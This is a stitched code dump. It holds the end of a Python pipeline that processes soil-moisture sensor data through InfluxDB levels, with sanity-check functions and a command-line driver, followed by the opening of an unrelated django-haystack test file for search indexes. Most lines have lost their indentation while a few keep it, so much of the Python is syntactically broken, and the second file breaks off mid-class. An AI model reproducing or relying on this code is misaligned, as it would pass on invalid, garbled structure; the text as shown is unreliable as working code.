_ = next(points2)
continue
bat = p['battery']
p2 = next(points2)
count_diff = p2['count_diff']
            prev_count = count - count_diff
            if prev_count < 0:
                raise ValueError("Incorrect previous_count calculation.")
if bat < 10:
flag = 4
elif count < (0.8 * prev_count) or count > (1.2 * prev_count):
flag = 1
else:
flag = p['raw_flag']
json_body = {
"measurement": "level1",
#"measurement": "level1_temp",
"tags": {
"site_no": p['site_no'],
"flag": int(flag),
},
"time": time_str,
"fields": {
"count": int(p['count']),
"pressure1": float(p['pressure1']),
"internal_temperature": float(p['internal_temperature']),
"internal_humidity": float(p['internal_humidity']),
"battery": float(p['battery']),
"tube_temperature": float(p['tube_temperature']),
"tube_humidity": float(p['tube_humidity']),
"rain": float(p['rain']),
"vwc1": float(p['vwc1']),
"vwc2": float(p['vwc2']),
"vwc3": float(p['vwc3']),
"pressure2": float(p['pressure2']),
"external_temperature": float(p['external_temperature']),
"external_humidity": float(p['external_humidity']),
}
}
writer.write_point(json_body)
def fix_raws(site_no=1):
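    """Delete raw_values rows for a site where both count and battery are null."""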
result = influx_client.query("""\
SELECT *
FROM "raw_values"
WHERE site_no='{}';""".format(site_no))
points = result.get_points()
bad_times = []
for p in points:
count = p['count']
battery = p['battery']
time = p['time']
if count is None and battery is None:
bad_times.append(time)
if len(bad_times) < 1:
return
for bad_t in bad_times:
del_query = """\
DELETE FROM "raw_values"
WHERE site_no='{}' AND time='{}';""".format(site_no, bad_t)
result = influx_client.query(del_query)
print(result)
return
def test1(site_no=1, start_time=None):
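    """Sanity check: level1 and level1_temp should contain identical points."""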
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
back_time = start_time - TEN_YEARS
time_string = datetime_to_isostring(back_time)
result1 = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, internal_temperature, internal_humidity, battery, tube_temperature, tube_humidity, rain, vwc1, vwc2, vwc3, pressure2, external_temperature, external_humidity, flag
FROM "level1"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points1 = result1.get_points()
result2 = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, internal_temperature, internal_humidity, battery, tube_temperature, tube_humidity, rain, vwc1, vwc2, vwc3, pressure2, external_temperature, external_humidity, flag
FROM "level1_temp"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points2 = result2.get_points()
_ = next(points1)
t = 0
d = 0
for p1 in points1:
p2 = next(points2)
t += 1
diffkeys = [k for k in p1 if p1[k] != p2[k]]
for k in diffkeys:
d += 1
print(k, ':', p1[k], '->', p2[k])
return d < 1
def test2(site_no=1, start_time=None):
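    """Sanity check: level2 and level2_temp should match to within a tiny relative tolerance."""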
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
back_time = start_time - TEN_YEARS
time_string = datetime_to_isostring(back_time)
result1 = influx_client.query("""\
SELECT "time", site_no, "count", press_corr, wv_corr, intensity_corr, corr_count, flag
FROM "level2"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points1 = result1.get_points()
result2 = influx_client.query("""\
SELECT "time", site_no, "count", press_corr, wv_corr, intensity_corr, corr_count, flag
FROM "level2_temp"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points2 = result2.get_points()
t = 0
d = 0
for p1 in points1:
p2 = next(points2)
t += 1
diffkeys = [k for k in p1 if p1[k] != p2[k]]
for k in diffkeys:
orig_one = p1[k]
if isinstance(orig_one, float):
diff = math.fabs(orig_one - p2[k])
diff_perc = (diff/orig_one) * 100
#these all seem to be 0.00000088888888 different. (8.8888888e-07)
if diff_perc < 8.88888912e-07:
#print("Close enough:", k, ':', p1[k], '->', p2[k], "d:", diff, "p:", diff_perc)
pass
else:
d += 1
print("Not close enough:", k, ':', p1[k], '->', p2[k], "d:", diff, "p:", diff_perc)
print(p1)
print(p2)
else:
d += 1
print("Different!", k, ':', p1[k], '->', p2[k])
print(p1)
print(p2)
if d > 0:
percent_wrong = (d/t) * 100
print("Percentage of total entries with differences: {}/{} {}%".format(d, t, percent_wrong))
return d < 1
def test3(site_no=1, start_time=None):
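    """Sanity check: level3 and level3_temp should match to within a small absolute or relative tolerance."""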
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
back_time = start_time - TEN_YEARS
time_string = datetime_to_isostring(back_time)
result1 = influx_client.query("""\
--SELECT "time", site_no, soil_moist, effective_depth, flag
SELECT "time", site_no, soil_moist, effective_depth, rainfall, flag
FROM "level3"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points1 = result1.get_points()
result2 = influx_client.query("""\
--SELECT "time", site_no, soil_moist, effective_depth, flag
SELECT "time", site_no, soil_moist, effective_depth, rainfall, flag
FROM "level3_temp"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points2 = result2.get_points()
t = 0
d = 0
for p1 in points1:
p2 = next(points2)
t += 1
diffkeys = [k for k in p1 if p1[k] != p2[k]]
for k in diffkeys:
orig_one = p1[k]
if isinstance(orig_one, float):
diff = math.fabs(orig_one - p2[k])
diff_perc = (diff / orig_one) * 100
if diff < 0.00001 or diff_perc < 0.00033:
pass
else:
d += 1
print("Not close enough:", k, ':', p1[k], '->', p2[k], "d:", diff, "p:", diff_perc)
print(p1)
print(p2)
else:
d += 1
print("Different!", k, ':', p1[k], '->', p2[k])
print(p1)
print(p2)
if d > 0:
percent_wrong = (d/t) * 100
print("Percentage of total entries with differences: {}/{} {}%".format(d, t, percent_wrong))
return d < 1
def test4(site_no=1, start_time=None):
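    """Sanity check: level4 and level4_temp should match to within a small absolute or relative tolerance."""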
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
back_time = start_time - TEN_YEARS
time_string = datetime_to_isostring(back_time)
result1 = influx_client.query("""\
SELECT "time", site_no, soil_moist, effective_depth, rainfall, soil_moist_filtered, depth_filtered
FROM "level4"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points1 = result1.get_points()
result2 = influx_client.query("""\
SELECT "time", site_no, soil_moist, effective_depth, rainfall, soil_moist_filtered, depth_filtered
FROM "level4_temp"
WHERE "time" > '{}' AND site_no='{}';""".format(time_string, site_no))
points2 = result2.get_points()
t = 0
d = 0
for p1 in points1:
try:
p2 = next(points2)
except StopIteration:
break
t += 1
diffkeys = [k for k in p1 if p1[k] != p2[k]]
for k in diffkeys:
orig_one = p1[k]
if isinstance(orig_one, float):
diff = math.fabs(orig_one - p2[k])
diff_perc = (diff / orig_one) * 100
# these all seem to be 0.00000088888888 different. (8.8888888e-07)
if diff < 3.29e-05 or diff_perc < 4.8e-06:
# print("Close enough: ", k, ':', p1[k], '->', p2[k], "d:", diff)
pass
else:
d += 1
print("Not close enough:", k, ':', p1[k], '->', p2[k], "d:", diff, "p:", diff_perc)
print(p1)
print(p2)
else:
d += 1
print("Different!", k, ':', p1[k], '->', p2[k])
print(p1)
print(p2)
if d > 0:
percent_wrong = (d/t) * 100
print("Percentage of total entries with differences: {}/{} {}%".format(d, t, percent_wrong))
return d < 1
def process_levels(site_no, options=None):
    """Run the full raw -> level1 -> level2 -> level3 -> level4 pipeline for one site."""
    # Avoid a mutable default argument for options.
    if options is None:
        options = {}
    start_time = options.get('start_time', None)
    backprocess = options.get('backprocess', None)
    do_tests = options.get('do_tests', False)
    drop_old = options.get('drop_old', False)
mongo_client2 = MongoClient(mongodb_config['DB_HOST'], int(mongodb_config['DB_PORT'])) # 27017
p_start_time = datetime.now().astimezone(timezone.utc)
if start_time is None:
start_time = p_start_time
print("Starting process_levels for site {}, at {}".format(site_no, p_start_time))
if do_tests:
print("Doing site {} with sanity tests turned on. This takes longer.".format(site_no))
#fix_raws(site_no=site_no)
raw_to_level1(site_no=site_no, start_time=start_time, backprocess=backprocess, drop_old=drop_old)
print("Finished raw->level1 for site {}, starting level1->level2.".format(site_no))
if do_tests:
assert test1(site_no=site_no, start_time=start_time)
level1_to_level2(mongo_client2, site_no=site_no, start_time=start_time, backprocess=backprocess, drop_old=drop_old)
print("Finished level1->level2 for site {}, starting level2->level3.".format(site_no))
if do_tests:
assert test2(site_no=site_no, start_time=start_time)
level2_to_level3(mongo_client2, site_no=site_no, start_time=start_time, backprocess=backprocess, drop_old=drop_old)
print("Finished level2->level3 for site {}, starting level3->level4.".format(site_no))
if do_tests:
assert test3(site_no=site_no, start_time=start_time)
level3_to_level4(site_no=site_no, start_time=start_time, backprocess=backprocess, drop_old=drop_old)
if do_tests:
assert test4(site_no=site_no, start_time=start_time)
p_end_time = datetime.now().astimezone(timezone.utc)
print("Finished process_levels for site {}, at {}".format(site_no, p_end_time))
print("Site {} process_levels took {}".format(site_no, (p_end_time-p_start_time)))
# if __name__ == "__main__":
# from threading import Thread
# #process_levels(site_no=2, do_tests=True)
# mdb = getattr(mongo_client, mongodb_config['DB_NAME'])
# all_sites = mdb.all_sites
# all_stations_docs = mdb.all_stations
# all_stations = all_stations_docs.find({}, {'site_no': 1})
# start_time = datetime.now().astimezone(timezone.utc)
# threads = []
# print("Using multithreading")
# for s in all_stations:
# site_no = s['site_no']
# #process_levels(site_no, start_time=start_time, do_tests=False, backprocess=ONE_YEAR)
# t = Thread(target=process_levels, args=(site_no,), kwargs={'start_time':start_time, 'do_tests': False, 'backprocess': ONE_YEAR})
# t.start()
# threads.append(t)
# _ = [t.join() for t in threads]
# end_time = datetime.utcnow()
# print("Finished process_levels for All Sites at {}".format(end_time))
# print("All sites process_levels took {}".format((end_time-start_time)))
def main():
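    """Parse command-line options and run process_levels for the selected sites,
    either inline for a single station or across a multiprocessing Pool."""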
start_time = datetime.now().astimezone(timezone.utc)
parser = argparse.ArgumentParser(description='Run the processing levels on the cosmoz influxdb.')
parser.add_argument('-s', '--site-number', type=str, dest="siteno",
help='Pick just one site number')
parser.add_argument('-d', '--process-days', type=str, dest="processdays",
help='Number of days to backprocess. Default is 365 days.')
parser.add_argument('-xx', '--dropold', dest="drop_old", action="store_true",
help='Drop old contents of table before processing its contents. USE WITH CAUTION!')
parser.add_argument('-t', '--from-datetime', type=str, dest="fromdatetime",
help='The earliest datetime to backprocess to. In isoformat. Default is all of history.\nNote cannot use -d and -t together.')
parser.add_argument('-o', '--output', dest='output', nargs='?', type=argparse.FileType('w'),
help='Send output to a file (defaults to stdout).',
default=sys.stdout)
args = parser.parse_args()
outfile = args.output
def printout(*values, sep=' ', end='\n'):
return print(*values, sep=sep, end=end, file=outfile, flush=True)
try:
processdays = args.processdays
fromdatetime = args.fromdatetime
drop_old = args.drop_old
siteno = args.siteno
if processdays is not None and fromdatetime is not None:
raise RuntimeError("Cannot use -d and -t at the same time. Pick one.")
if processdays:
try:
processdays = int(processdays)
            except (TypeError, ValueError):
raise RuntimeError("-d must be an integer")
backprocess = timedelta(days=processdays)
else:
if fromdatetime is None:
backprocess = ONE_YEAR
else:
fromdatetime = isostring_to_datetime(fromdatetime)
backprocess = start_time - fromdatetime
if backprocess.days < 0:
raise RuntimeError("Cannot backprocess negative time. Ensure it is positive.")
mongo_client = MongoClient(mongodb_config['DB_HOST'], int(mongodb_config['DB_PORT'])) # 27017
mdb = getattr(mongo_client, mongodb_config['DB_NAME'])
all_sites = mdb.all_sites
all_stations_docs = mdb.all_stations
if siteno is not None:
sitenos = [int(s.strip()) for s in siteno.split(',') if s]
all_stations = all_stations_docs.find({'site_no': {"$in": sitenos}}, {'site_no': 1})
else:
all_stations = all_stations_docs.find({}, {'site_no': 1})
mongo_client.close()
worker_options = {'start_time': start_time, 'do_tests': False, 'backprocess': backprocess, 'drop_old': drop_old}
        all_stations = list(all_stations)  # This turns the Mongo cursor into a Python list
if len(all_stations) < 1:
printout("No stations to process.")
return
        elif len(all_stations) < 2:
            only_site = all_stations[0]['site_no']
            printout("Only doing station {}".format(only_site))
            process_levels(only_site, worker_options)
            end_time = datetime.now().astimezone(timezone.utc)
            printout("Finished process_levels for site {} at {}".format(only_site, end_time))
            printout("process_levels took {}".format(end_time - start_time))
else:
printout("Using multiprocessing")
processes = []
pool = Pool(None) # uses os.cpu_count
with pool as p:
worker_args = [(s['site_no'], worker_options) for s in all_stations]
p.starmap(process_levels, worker_args)
end_time = datetime.now().astimezone(timezone.utc)
printout("Finished process_levels for All Sites at {}".format(end_time))
printout("All sites process_levels took {}".format((end_time - start_time)))
    finally:
        # Only close real output files, never sys.stdout.
        if outfile is not sys.stdout:
            outfile.close()
if __name__ == "__main__":
main()
|
test_indexes.py
|
# encoding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
import time
from threading import Thread
from django.test import TestCase
from six.moves import queue
from test_haystack.core.models import (
AFifthMockModel,
AnotherMockModel,
AThirdMockModel,
ManyToManyLeftSideModel,
ManyToManyRightSideModel,
MockModel,
)
from haystack import connections, indexes
from haystack.exceptions import SearchFieldError
from haystack.utils.loading import UnifiedIndex
class BadSearchIndex1(indexes.SearchIndex, indexes.Indexable):
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
def get_model(self):
return MockModel
class BadSearchIndex2(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
content2 = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
def get_model(self):
return MockModel
class GoodMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
extra = indexes.CharField(indexed=False, use_template=True)
def get_model(self):
return MockModel
# For testing inheritance...
class AltGoodMockSearchIndex(GoodMockSearchIndex, indexes.Indexable):
additional = indexes.CharField(model_attr="author")
def get_model(self):
return MockModel
class GoodCustomMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author", faceted=True)
pub_date = indexes.DateTimeField(model_attr="pub_date", faceted=True)
extra = indexes.CharField(indexed=False, use_template=True)
hello = indexes.CharField(model_attr="hello")
def prepare(self, obj):
super(GoodCustomMockSearchIndex, self).prepare(obj)
self.prepared_data["whee"] = "Custom preparation."
return self.prepared_data
def prepare_author(self, obj):
return "Hi, I'm %s" % self.prepared_data["author"]
def load_all_queryset(self):
return self.get_model()._default_manager.filter(id__gt=1)
def get_model(self):
return MockModel
def index_queryset(self, using=None):
return MockModel.objects.all()
def read_queryset(self, using=None):
return MockModel.objects.filter(author__in=["daniel1", "daniel3"])
def build_queryset(self, start_date=None, end_date=None):
return MockModel.objects.filter(author__in=["daniel1", "daniel3"])
class GoodNullableMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author", null=True, faceted=True)
def get_model(self):
return MockModel
class GoodOverriddenFieldNameMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(
document=True, use_template=True, index_fieldname="more_content"
)
author = indexes.CharField(model_attr="author", index_fieldname="name_s")
hello = indexes.CharField(model_attr="hello")
def get_model(self):
return MockModel
class GoodFacetedMockSearchIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
author = indexes.CharField(model_attr="author")
author_foo = indexes.FacetCharField(facet_for="author")
pub_date = indexes.DateTimeField(model_attr="pub_date")
pub_date_exact = indexes.FacetDateTimeField(facet_for="pub_date")
def get_model(self):
return MockModel
def prepare_author(self, obj):
return "Hi, I'm %s" % self.prepared_data["author"]
def prepare_pub_date_exact(self, obj):
return "2010-10-26T01:54:32"
class MROFieldsSearchIndexA(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="test_a")
def get_model(self):
return MockModel
class MROFieldsSearchIndexB(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, model_attr="test_b")
def get_model(self):
return MockModel
class MROFieldsSearchChild(MROFieldsSearchIndexA, MROFieldsSearchIndexB):
pass
class ModelWithManyToManyFieldAndAttributeLookupSearchIndex(
indexes.SearchIndex, indexes.Indexable
):
text = indexes.CharField(document=True)
related_models = indexes.MultiValueField(model_attr="related_models__name")
def get_model(self):
return ManyToManyLeftSideModel
class SearchIndexTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super(SearchIndexTestCase, self).setUp()
self.sb = connections["default"].get_backend()
self.mi = GoodMockSearchIndex()
self.cmi = GoodCustomMockSearchIndex()
self.cnmi = GoodNullableMockSearchIndex()
self.gfmsi = GoodFacetedMockSearchIndex()
# Fake the unified index.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.ui.build(indexes=[self.mi])
connections["default"]._index = self.ui
self.sample_docs = {
"core.mockmodel.1": {
"text": "Indexed!\n1",
"django_id": "1",
"django_ct": "core.mockmodel",
"extra": "Stored!\n1",
"author": "daniel1",
"pub_date": datetime.datetime(2009, 3, 17, 6, 0),
"id": "core.mockmodel.1",
},
"core.mockmodel.2": {
"text": "Indexed!\n2",
"django_id": "2",
"django_ct": "core.mockmodel",
"extra": "Stored!\n2",
"author": "daniel2",
"pub_date": datetime.datetime(2009, 3, 17, 7, 0),
"id": "core.mockmodel.2",
},
"core.mockmodel.3": {
"text": "Indexed!\n3",
"django_id": "3",
"django_ct": "core.mockmodel",
"extra": "Stored!\n3",
"author": "daniel3",
"pub_date": datetime.datetime(2009, 3, 17, 8, 0),
"id": "core.mockmodel.3",
},
}
def tearDown(self):
connections["default"]._index = self.old_unified_index
super(SearchIndexTestCase, self).tearDown()
def test_no_contentfield_present(self):
self.assertRaises(SearchFieldError, BadSearchIndex1)
def test_too_many_contentfields_present(self):
self.assertRaises(SearchFieldError, BadSearchIndex2)
def test_contentfield_present(self):
try:
mi = GoodMockSearchIndex()
        except Exception:
self.fail()
def test_proper_fields(self):
self.assertEqual(len(self.mi.fields), 4)
self.assertTrue("text" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["text"], indexes.CharField))
self.assertTrue("author" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("extra" in self.mi.fields)
self.assertTrue(isinstance(self.mi.fields["extra"], indexes.CharField))
self.assertEqual(len(self.cmi.fields), 7)
self.assertTrue("text" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["text"], indexes.CharField))
self.assertTrue("author" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["author"], indexes.CharField))
self.assertTrue("author_exact" in self.cmi.fields)
self.assertTrue(
isinstance(self.cmi.fields["author_exact"], indexes.FacetCharField)
)
self.assertTrue("pub_date" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("pub_date_exact" in self.cmi.fields)
self.assertTrue(
isinstance(self.cmi.fields["pub_date_exact"], indexes.FacetDateTimeField)
)
self.assertTrue("extra" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["extra"], indexes.CharField))
self.assertTrue("hello" in self.cmi.fields)
self.assertTrue(isinstance(self.cmi.fields["extra"], indexes.CharField))
def test_index_queryset(self):
self.assertEqual(len(self.cmi.index_queryset()), 3)
def test_read_queryset(self):
self.assertEqual(len(self.cmi.read_queryset()), 2)
def test_build_queryset(self):
# The custom SearchIndex.build_queryset returns the same records as
# the read_queryset
self.assertEqual(len(self.cmi.build_queryset()), 2)
# Store a reference to the original method
old_guf = self.mi.__class__.get_updated_field
self.mi.__class__.get_updated_field = lambda self: "pub_date"
        # With an updated field, we should have filtered results
sd = datetime.datetime(2009, 3, 17, 7, 0)
self.assertEqual(len(self.mi.build_queryset(start_date=sd)), 2)
ed = datetime.datetime(2009, 3, 17, 7, 59)
self.assertEqual(len(self.mi.build_queryset(end_date=ed)), 2)
sd = datetime.datetime(2009, 3, 17, 6, 0)
ed = datetime.datetime(2009, 3, 17, 6, 59)
self.assertEqual(len(self.mi.build_queryset(start_date=sd, end_date=ed)), 1)
# Remove the updated field for the next test
del self.mi.__class__.get_updated_field
# The default should return all 3 even if we specify a start date
# because there is no updated field specified
self.assertEqual(len(self.mi.build_queryset(start_date=sd)), 3)
# Restore the original attribute
self.mi.__class__.get_updated_field = old_guf
def test_prepare(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.mi.prepare(mock)), 7)
self.assertEqual(
sorted(self.mi.prepare(mock).keys()),
["author", "django_ct", "django_id", "extra", "id", "pub_date", "text"],
)
def test_custom_prepare(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
def test_thread_safety(self):
# This is a regression. ``SearchIndex`` used to write to
# ``self.prepared_data``, which would leak between threads if things
# went too fast.
exceptions = []
def threaded_prepare(index_queue, index, model):
try:
index.queue = index_queue
prepped = index.prepare(model)
except Exception as e:
exceptions.append(e)
raise
class ThreadedSearchIndex(GoodMockSearchIndex):
def prepare_author(self, obj):
if obj.pk == 20:
time.sleep(0.1)
else:
time.sleep(0.5)
index_queue.put(self.prepared_data["author"])
return self.prepared_data["author"]
tmi = ThreadedSearchIndex()
index_queue = queue.Queue()
mock_1 = MockModel()
mock_1.pk = 20
mock_1.author = "foo"
mock_1.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
mock_2 = MockModel()
mock_2.pk = 21
mock_2.author = "daniel%s" % mock_2.id
mock_2.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
th1 = Thread(target=threaded_prepare, args=(index_queue, tmi, mock_1))
th2 = Thread(target=threaded_prepare, args=(index_queue, tmi, mock_2))
th1.start()
th2.start()
th1.join()
th2.join()
mock_1_result = index_queue.get()
mock_2_result = index_queue.get()
self.assertEqual(mock_1_result, "foo")
self.assertEqual(mock_2_result, "daniel21")
def test_custom_prepare_author(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(self.cmi.prepared_data["author"], "Hi, I'm daniel20")
self.assertEqual(self.cmi.prepared_data["author_exact"], "Hi, I'm daniel20")
def test_custom_model_attr(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.assertEqual(len(self.cmi.prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(len(self.cmi.full_prepare(mock)), 11)
self.assertEqual(
sorted(self.cmi.full_prepare(mock).keys()),
[
"author",
"author_exact",
"django_ct",
"django_id",
"extra",
"hello",
"id",
"pub_date",
"pub_date_exact",
"text",
"whee",
],
)
self.assertEqual(self.cmi.prepared_data["hello"], "World!")
def test_custom_index_fieldname(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
cofnmi = GoodOverriddenFieldNameMockSearchIndex()
self.assertEqual(len(cofnmi.prepare(mock)), 6)
self.assertEqual(
sorted(cofnmi.prepare(mock).keys()),
["django_ct", "django_id", "hello", "id", "more_content", "name_s"],
)
self.assertEqual(cofnmi.prepared_data["name_s"], "daniel20")
self.assertEqual(cofnmi.get_content_field(), "more_content")
def test_get_content_field(self):
self.assertEqual(self.mi.get_content_field(), "text")
def test_update(self):
self.sb.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
self.mi.update()
self.assertEqual(self.sb.search("*")["hits"], 3)
self.sb.clear()
def test_update_object(self):
self.sb.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "20")],
)
self.sb.clear()
def test_remove_object(self):
self.mi.update()
self.assertEqual(self.sb.search("*")["hits"], 3)
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(self.sb.search("*")["hits"], 4)
self.mi.remove_object(mock)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "1"), ("core.mockmodel", "2"), ("core.mockmodel", "3")],
)
# Put it back so we can test passing kwargs.
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
self.mi.update_object(mock)
self.assertEqual(self.sb.search("*")["hits"], 4)
self.mi.remove_object(mock, commit=False)
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[
("core.mockmodel", "1"),
("core.mockmodel", "2"),
("core.mockmodel", "3"),
("core.mockmodel", "20"),
],
)
self.sb.clear()
def test_clear(self):
self.mi.update()
self.assertGreater(self.sb.search("*")["hits"], 0)
self.mi.clear()
self.assertEqual(self.sb.search("*")["hits"], 0)
def test_reindex(self):
self.mi.reindex()
self.assertEqual(
[(res.content_type(), res.pk) for res in self.sb.search("*")["results"]],
[("core.mockmodel", "1"), ("core.mockmodel", "2"), ("core.mockmodel", "3")],
)
self.sb.clear()
def test_inheritance(self):
try:
agmi = AltGoodMockSearchIndex()
        except Exception:
self.fail()
self.assertEqual(len(agmi.fields), 5)
self.assertTrue("text" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["text"], indexes.CharField))
self.assertTrue("author" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["author"], indexes.CharField))
self.assertTrue("pub_date" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["pub_date"], indexes.DateTimeField))
self.assertTrue("extra" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["extra"], indexes.CharField))
self.assertTrue("additional" in agmi.fields)
self.assertTrue(isinstance(agmi.fields["additional"], indexes.CharField))
def test_proper_field_resolution(self):
mrofsc = MROFieldsSearchChild()
mock = MockModel()
mock.pk = 20
mock.author = "daniel%s" % mock.id
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
mock.test_a = "This is A"
mock.test_b = "This is B"
self.assertEqual(len(mrofsc.fields), 1)
prepped_data = mrofsc.prepare(mock)
self.assertEqual(len(prepped_data), 4)
self.assertEqual(prepped_data["text"], "This is A")
def test_load_all_queryset(self):
self.assertEqual([obj.id for obj in self.cmi.load_all_queryset()], [2, 3])
def test_nullable(self):
mock = MockModel()
mock.pk = 20
mock.author = None
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
prepared_data = self.cnmi.prepare(mock)
self.assertEqual(len(prepared_data), 6)
self.assertEqual(
sorted(prepared_data.keys()),
["author", "author_exact", "django_ct", "django_id", "id", "text"],
)
prepared_data = self.cnmi.full_prepare(mock)
self.assertEqual(len(prepared_data), 4)
self.assertEqual(
sorted(prepared_data.keys()), ["django_ct", "django_id", "id", "text"]
)
def test_custom_facet_fields(self):
mock = MockModel()
mock.pk = 20
mock.author = "daniel"
mock.pub_date = datetime.datetime(2009, 1, 31, 4, 19, 0)
prepared_data = self.gfmsi.prepare(mock)
self.assertEqual(len(prepared_data), 8)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"author_foo",
"django_ct",
"django_id",
"id",
"pub_date",
"pub_date_exact",
"text",
],
)
prepared_data = self.gfmsi.full_prepare(mock)
self.assertEqual(len(prepared_data), 8)
self.assertEqual(
sorted(prepared_data.keys()),
[
"author",
"author_foo",
"django_ct",
"django_id",
"id",
"pub_date",
"pub_date_exact",
"text",
],
)
self.assertEqual(prepared_data["author_foo"], "Hi, I'm daniel")
self.assertEqual(prepared_data["pub_date_exact"], "2010-10-26T01:54:32")
class BasicModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
class FieldsModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
fields = ["author", "pub_date"]
class ExcludesModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = MockModel
excludes = ["author", "foo"]
class FieldsWithOverrideModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
foo = indexes.IntegerField(model_attr="foo")
class Meta:
model = MockModel
fields = ["author", "foo"]
def get_index_fieldname(self, f):
if f.name == "author":
return "author_bar"
else:
return f.name
class YetAnotherBasicModelSearchIndex(indexes.ModelSearchIndex, indexes.Indexable):
